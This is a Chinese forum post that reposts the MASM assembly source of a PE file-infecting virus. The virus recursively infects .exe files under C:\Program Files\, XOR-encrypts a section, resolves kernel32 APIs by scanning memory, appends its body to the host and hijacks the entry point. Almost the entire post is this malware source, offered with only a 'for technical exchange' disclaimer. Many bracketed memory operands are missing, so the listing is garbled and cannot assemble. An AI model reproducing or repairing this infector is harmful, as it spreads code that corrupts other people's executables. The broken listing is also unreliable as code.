发个病毒的源码
发个病毒的源码，从别的地方转过来，用汇编写的。以下内容只做技术交流，请勿用于非法用途。（转载时方括号内的内存操作数已丢失，下面的清单并不完整，无法直接汇编。）
============================================
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Module:peinj.asm
;
;Author:charme
;Email:charme000@gmail.com
;Time:2009.8.13
;Index:www.hi.baidu.com/charme000
;Description:
;
;-感染c:\Program Files\下的exe文件
;-加密开始的一个节
;-key也简单
;
;Copyright (c) 2009 charme.
;
;Just for fun!
;Do it ,do our best!
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.486
.model flat,stdcall
option casemap :none
include windows.inc
include kernel32.inc
includelib kernel32.lib
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
VIRUS_SIZE equ end_virus - start_virus ;病毒大小
VIRUS_BODYSIZE equ end_virus - virus_body ;病毒体大小
VIRUS_DECRSIZE equ virus_body - start_virus ;病毒头大小
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;三个过程
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
@InfectFile PROTO
@FirstRecurse PROTO
@FindEexRecurse PROTO
.data
dummy dd 0
;;==============================================================;; == = = == =
;;=------------------------------------------------------------=;; == == ==
;;= =;; = = == =
;;= **的开始 =;; = = == =
;;= =;; = = = = =
;;=------------------------------------------------------------=;; == = = =
;;==============================================================;; = = == = === == ====www.hi.baidu.com/charme000==
.code
start_virus:
call GetDelta ;变量,执行完push esp
GetDelta:
pop ebp
sub ebp,offset GetDelta;典型的重定位
;*
@@:
lea esi,
lea edi,
mov ecx, VIRUS_BODYSIZE;一看就是准备循环
mov bl, ;加密
@@:
.if ecx == 0
jmp @F
.endif
lodsb ;从esi指向的内存中读取一个字节到al中,同时inc esi
xor al,bl ;逐字节加密
stosb ;把al中的内存存入edi
dec ecx ;递减计数
jmp @B
@@:
jmp @F ;跳转到*处
virus_body: ;开始病毒执行体
db "charme"
@@:
mov esi,
mov edi,esi
mov ecx, ;作为计数
@@:
.if ecx == 0
jmp @F
.endif
lodsb
xor al,bl
stosb
dec ecx
jmp @B
@@:
mov ,bl;保存密匙
mov eax,
and eax,0FFFFF000h;找到基址
compare:
cmp WORD ptr ,'ZM'
je api_found
sub eax, 1000h;一页一页搜索
jmp compare;循环
api_found:
;LoadLibrary
mov , eax;保存指针
lea esi,
callGetFunctionAddress
mov ,eax;保存函数地址
;FindFirstFile
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;SetCurrentDirectory
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;GetFileAttributes
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;FindNextFile
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;FindClose
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;CreateFile
mov eax,
lea esi,
call GetFunctionAddress
mov DWORD ptr ,eax
;lstrcpy
mov eax,
lea esi,
call GetFunctionAddress
mov DWORD ptr ,eax
;GetFileSize
mov eax,
lea esi,
call GetFunctionAddress
mov DWORD ptr ,eax
;CreateFileMapping
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;MapViewOfFile
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;ExitProcess
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;UnmapViewOfFile
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
;CloseHandle
mov eax,
lea esi,
call GetFunctionAddress
mov ,eax
jmp found_all;来个大跳转
;;-----------------------;;
;; 从导入表找函数 ;;
;;-----------------------;;
GetFunctionAddress:
mov ebx, ;pe header
add ebx, eax;加上基址
add ebx, 120
mov ebx,
add ebx, eax ;Export Address
xor edx, edx
mov ecx, ;functionname
add ecx, eax
push esi
push edx
CompareNext:
pop edx
pop esi
inc edx
mov edi,
add edi, eax
add ecx, 4
push esi
push edx
CompareName:
mov dl,
mov dh,
cmp dl, dh
jne CompareNext
inc edi
inc esi
cmp BYTE ptr , 0
je GetAddress
jmp CompareName
GetAddress:
pop edx
pop esi
dec edx
shl edx, 1
mov ecx,
add ecx, eax
add ecx, edx
xor edx, edx
mov dx,
shl edx, 2
mov ecx,
add ecx, eax
add ecx, edx
add eax,
ret
found_all:
lea esi,
push esi
mov eax,;changes the current directory for the current process
call eax
push ebp
call @FirstRecurse;这个是自己定义的函数
pop ebp
jmp end_virus
;;-----------------------;;
;; 找exe ;;
;;-----------------------;;
@FindEexRecurse PROC
;HANDLE FindFirstFile(
;LPCTSTR lpFileName,
;LPWIN32_FIND_DATA lpFindFileData
;);
lea eax,
push eax
lea eax,
push eax
mov eax,
call eax
mov ,eax;保存返回的文件句柄
.if eax == INVALID_HANDLE_VALUE
mov eax,-1
jmp finish
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName;查询这个成员
mov esi,eax
lodsb;从esi中取出一个字节放入al
.if al == '.'
jmp @F
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
push eax;这里其实push一个就可以了
mov eax,
call eax;返回一个文件或者目录的属性
.if eax != FILE_ATTRIBUTE_DIRECTORY;如果是目录
pop eax
mov ,eax
call @InfectFile;感染之
.else
pop eax
.endif
@@:
lea esi,
push esi
mov esi,
push esi
mov eax,
call eax;继续找文件
.if eax == 0
jmp @F
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
mov esi,eax
lodsb
.if al == '.'
jmp @B;继续找文件
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
push eax
mov eax,
call eax
.if eax != FILE_ATTRIBUTE_DIRECTORY
pop eax
mov ,eax
call @InfectFile
.else
pop eax
.endif
jmp @B;一直循环
@@:
finish:
ret
@FindEexRecurse ENDP
;;-----------------------;;
;; 一级资源 ;;
;;-----------------------;;
@FirstRecurse PROC
lea esi,
push esi
lea esi,
push esi
mov eax,
call eax
mov ,eax
.if eax == INVALID_HANDLE_VALUE
mov eax,-1
jmp finish1
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
mov esi,eax
lodsb
.if al == '.'
jmp @F
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
mov eax,
call eax
.if eax == FILE_ATTRIBUTE_DIRECTORY
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
mov eax,
call eax
call @FindEexRecurse
lea eax,
push eax
mov eax,
call eax
.endif
@@:
lea esi,
push esi
mov eax,
push eax
mov eax,
call eax
.if eax == 0
jmp @F
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
mov esi,eax
lodsb
.if al == '.'
jmp @B
.endif
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
mov eax,
call eax
.if eax == FILE_ATTRIBUTE_DIRECTORY
lea esi,
assume esi:ptr WIN32_FIND_DATA
lea eax,.cFileName
push eax
mov eax,
call eax
call @FindEexRecurse
lea eax,
push eax
mov eax,
call eax
.endif
jmp @B
@@:
finish1:
ret
@FirstRecurse ENDP
;;-----------------------;;
;; 感染 ;;
;;-----------------------;;
@InfectFile PROC
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_ALWAYS
push NULL
push FILE_SHARE_READ or FILE_SHARE_WRITE
push GENERIC_WRITE or GENERIC_READ
mov eax,;文件指针
push eax
mov eax,;创建文件
call eax
mov ,eax;文件句柄
push NULL
push eax
mov eax,
call eax;获得文件大小
add eax,VIRUS_SIZE
add eax,1000h
mov ,eax;最后文件的大小
push 0
mov eax,
push eax
push 0
push PAGE_READWRITE
push NULL
mov eax,
push eax
mov eax,
call eax;创建映射文件
mov ,eax;hMap
push DWORD ptr
push 0
push 0
push FILE_MAP_WRITE
mov eax,
push eax
mov eax,
call eax;开始映射
mov ,eax
mov edi,eax
xor eax,eax
assume edi:ptr IMAGE_DOS_HEADER
mov ax,.e_magic
add edi,.e_lfanew
assume edi:ptr IMAGE_NT_HEADERS
add edi,SIZEOF DWORD
assume edi:ptr IMAGE_FILE_HEADER
xor ecx,ecx
mov cx,.NumberOfSections
mov ,ecx;节个数
add edi,SIZEOF IMAGE_FILE_HEADER
mov ,edi;到达节表处
assume edi:ptr IMAGE_OPTIONAL_HEADER32
mov eax,.ImageBase
mov ,eax;镜像基址
add eax,.AddressOfEntryPoint
mov ,eax;保存旧的入口点
mov eax,.FileAlignment
mov ,eax
add edi,SIZEOF IMAGE_OPTIONAL_HEADER32
assume edi:ptr IMAGE_SECTION_HEADER
; - EDI指向当前节表头
; - ESI 指向RawData高位
; - EAX holds ESI's "parent" segment header pointer
xor esi,esi
@@:
.if ecx == 0
jmp @F
.endif
; 加密第一个节表
.if esi == 0
mov eax,.PointerToRawData
mov ,eax
mov eax,.VirtualAddress
add ,eax;rva
mov eax,.Misc.VirtualSize
mov ,eax
mov al,BYTE ptr .Name1
mov ,al
mov eax,.Characteristics
or eax,0A0000020h
mov .Characteristics,eax
.endif
.if .PointerToRawData > esi
mov esi,.PointerToRawData
mov eax,edi
.endif
add edi,SIZEOF IMAGE_SECTION_HEADER
dec ecx
jmp @B;循环
@@:
mov edi,eax
assume edi:ptr IMAGE_SECTION_HEADER
mov ebx,.Misc.VirtualSize
add ebx,VIRUS_SIZE
add ebx,7
mov .Misc.VirtualSize,ebx
push edi
lea eax,.Name1
mov edi,eax
mov al,'.' ;text section
stosb
mov al,'t'
stosb
mov al,'e'
stosb
mov al,'x'
stosb
mov al,'t'
stosb
mov al,0
stosb
pop edi
xor edx,edx
mov eax,ebx
mov ebx,
div ebx;对齐下
.if edx == 0
mov eax,.Misc.VirtualSize
jmp dont_round
.endif
mov eax,.Misc.VirtualSize
mov ebx,
push ebx
xor ecx,ecx
mov edx,eax
@@:
inc ecx
shr ebx,1
.if ebx == 0
dec ecx
jmp @F
.endif
jmp @B
@@:
sar eax,cl
sal eax,cl
pop ebx
add eax,ebx
dont_round:
mov ebx,.SizeOfRawData
mov .SizeOfRawData,eax
sub eax,ebx
shr eax,12
shl eax,12
mov ,eax
mov eax,.Characteristics
or eax,0A0000020h
mov .Characteristics,eax
mov esi,.VirtualAddress
add esi,.Misc.VirtualSize
sub esi,VIRUS_SIZE
sub esi,7
push esi ; 新入口点
mov esi,.PointerToRawData
add esi,.Misc.VirtualSize
sub esi,VIRUS_SIZE
sub esi,7
mov edi,esi
add edi,
lea esi, ; 解密
mov ecx, VIRUS_DECRSIZE
rep movsb;esi中的拷贝到edi
lea esi,
mov ecx, VIRUS_BODYSIZE
mov bl,
;变换key
inc bl
; xor 0,bl = bl
xor al,al
mov ,al
@@:
.if ecx == 0
jmp @F
.endif
lodsb
xor al,bl
stosb
dec ecx
jmp @B
@@:
push edi
; 加密主体
mov esi,
add esi,
mov edi,esi
mov ecx,
@@:
.if ecx == 0
jmp @F
.endif
lodsb
xor al,bl
stosb
dec ecx
jmp @B
@@:
pop edi
mov al,0b8h;感染标记
stosb
mov eax,
stosd
mov ax,0d0ffh;还原标记
stosw
mov edi,
assume edi:ptr IMAGE_OPTIONAL_HEADER32
pop eax
mov .AddressOfEntryPoint,eax
pop eax
mov ebx,.SizeOfImage
mov eax,
add ebx,eax
mov .SizeOfImage,ebx
; 清理战场
mov eax,
push eax
mov eax,
call eax
mov eax,
push eax
mov eax,
call eax
mov eax,
push eax
mov eax,
call eax
ret
@InfectFile ENDP
jmp end_virus
;;-----------------------------------无穷寂寞--------------------------------------;;
xor_key db 0
firstSegtOffset dd 0
firstSegtVSize dd 0
firstSegtVOffs dd 0
firstSegtKey db 0
_LoadLibrary db "LoadLibrary",0
_a_LoadLibrary dd 0
_CreateFile db "CreateFile",0
_a_CreateFile dd 0
_CreateFileMapping db "CreateFileMapping",0
_a_CreateFileMapping dd 0
_MapViewOfFile db "MapViewOfFile",0
_a_MapViewOfFile dd 0
_SetCurrentDirectory db "SetCurrentDirectory",0
_a_SetCurrentDirectory dd 0
_ExitProcess db "ExitProcess",0
_a_ExitProcess dd 0
_MessageBox db "MessageBox",0
_a_MessageBox dd 0
_UnmapViewOfFile db "UnmapViewOfFile",0
_a_UnmapViewOfFile dd 0
_CloseHandle db "CloseHandle",0
_a_CloseHandle dd 0
_GetFileSize db "GetFileSize",0
_a_GetFileSize dd 0
_FindFirstFile db "FindFirstFile",0
_a_FindFirstFile dd 0
_GetFileAttributes db "GetFileAttributes",0
_a_GetFileAttributes dd 0
_FindNextFile db "FindNextFile",0
_a_FindNextFile dd 0
_FindClose db "FindClose",0
_a_FindClose dd 0
_lstrcpy db "lstrcpy",0
_a_lstrcpy dd 0
__DLL_User32 db "user32",0
__STRING_FileName db "petest.exe",0
__STRING_newdir db MAX_PATH dup(0)
__STRING_dotdot db "..",0
__STRING_filemask db "*.*",0
__STRING_Dot_Star db "*.*",0
__STRING_Dot_Exe db "*.exe",0
__STRING_Dot_Dot db "..",0
__HND_File dd 0
__HND_FirstFind dd 0
__HND_ExeFind dd 0
__MAP_File dd 0
__PTR_File dd 0
;_User32 dd 0
KernelBase dd 0
totalSec dd 0
ptrEP dd 0
oldEP dd 0
oldLast dd 0
secNum dd 0
fileAlign dd 0
deltaImage dd 0
oldrawsize dd 0
__STRUCT_Win32_FindData WIN32_FIND_DATA <>
__STRUCT_Win32_FindExes WIN32_FIND_DATA <>
_STRING_RootInfect db "C:\Program Files\",0
__PTR_fileName dd 0
__max_size dd 0
;;-----------------------------------无穷寂寞--------------------------------------;;
end_virus:
ret
end start_virus 支持一下花花 汇编 也厉害了。 从别的地方转的,只能看懂一部分~